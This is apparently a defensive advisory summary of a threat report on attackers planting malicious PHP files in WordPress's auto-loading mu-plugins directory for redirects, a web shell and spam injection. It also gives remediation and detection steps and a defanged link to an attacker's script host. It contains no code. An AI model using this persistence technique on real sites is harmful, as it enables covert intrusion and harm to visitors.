Full Report
Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the
Analysis Summary
# Vulnerability: Malicious Code Injection via WordPress `mu-plugins` Directory
## CVE Details
- CVE ID: N/A (This summary is based on a threat report, not a formal CVE release. Security updates often predate CVE assignment.)
- CVSS Score: N/A
- CWE: CWE-94 (Improper Control of Generation of Code ('Code Injection')) - *Inferred based on arbitrary code execution/script replacement.*
## Affected Systems
- Products: WordPress Core Installations utilizing the `mu-plugins` functionality.
- Versions: All versions of WordPress where the `wp-content/mu-plugins` directory is writable and accessible to an attacker who has already achieved initial access to the site.
- Configurations: Sites where attackers have gained initial access allowing file upload or modification within the WordPress installation structure to place malicious PHP scripts in the `wp-content/mu-plugins` directory.
## Vulnerability Description
Threat actors are actively exploiting vulnerabilities (initial vectors not specified, but implies prior compromise) to place malicious PHP scripts within the `wp-content/mu-plugins/` (Must-Use Plugins) directory of WordPress sites. Because these plugins are automatically loaded by WordPress without requiring administrator enablement, they provide a persistent, stealthy backdoor.
Three primary malicious payloads discovered were:
1. **`redirect.php`**: Redirects site visitors to external malicious websites, sometimes masquerading as browser updates to trick users into installing further malware, including data-stealing payloads. It uses bot-detection logic to hide redirects from search engine crawlers.
2. **`index.php`**: Provides web shell-like functionality, allowing attackers to download and execute remote PHP scripts from external sources (e.g., GitHub) to maintain remote code execution.
3. **`custom-js-loader.php`**: Injects spam, hijacks outbound links to malicious sites, and replaces legitimate images on the site with explicit content, likely for SEO manipulation or phishing.
## Exploitation
- Status: Exploited in the wild (Reported actively being used by threat actors).
- Complexity: Depends on the initial access vector gained by the attacker, but placing the code in `mu-plugins` suggests persistence is easily achieved post-compromise.
- Attack Vector: Post-initial compromise leveraging file write access. The secondary attack vectors observed on these compromised sites include ClickFix style attacks leading to Lumma Stealer trojans.
## Impact
- Confidentiality: High (Potential for configuration theft, data exfiltration via secondary malware deployed via initial access).
- Integrity: High (Arbitrary code execution, modification of site content/images, redirection of visitors).
- Availability: Medium (Site functionality can be disrupted by redirects and spam injections).
## Remediation
### Patches
There is no specific patch listed for a core WordPress vulnerability in this report, as the issue relates to an attacker utilizing a legitimate WordPress feature (`mu-plugins`) after gaining initial access. Remediation focuses on removing the malicious files and securing the initial entry point.
### Workarounds
1. **Immediate Deletion:** Immediately scan and delete any suspicious PHP files located in the `wp-content/mu-plugins/` directory, specifically looking for `redirect.php`, `index.php`, and `custom-js-loader.php` or any other unfamiliar files.
2. **Disable/Rename Directory (Temporary):** If an immediate cleanup is impossible, temporarily rename the `wp-content/mu-plugins` directory to prevent WordPress from loading any code within it.
3. **Secure Initial Access:** Trace back the initial infection vector (e.g., vulnerable plugins/themes, weak credentials) and secure it.
## Detection
- Indicators of Compromise:
* Unsolicited page redirects for legitimate visitors.
* Unexpected spam or explicit content appearing on site images.
* Unfamiliar PHP files in the `wp-content/mu-plugins/` directory.
* Evidence of remote code execution (especially scripts contacting external hosting like GitHub for payload delivery).
- Detection Methods and Tools:
* Use file integrity monitoring tools to track changes in the `/wp-content/mu-plugins/` folder.
* Review server access logs for unusual upload activity leading to the insertion of PHP files in this location.
* Security scanners (like Sucuri) specifically focusing on the `mu-plugins` directory structure.
## References
- Vendor Advisories: Sucuri Security Blog Analysis (URL defanged)
- Relevant Links:
* hXXps://blog.sucuri.net/2025/03/hidden-malware-strikes-again-mu-plugins-under-attack.html
* hXXps://github.com/starkvps99812/upd (Example host for fetched scripts)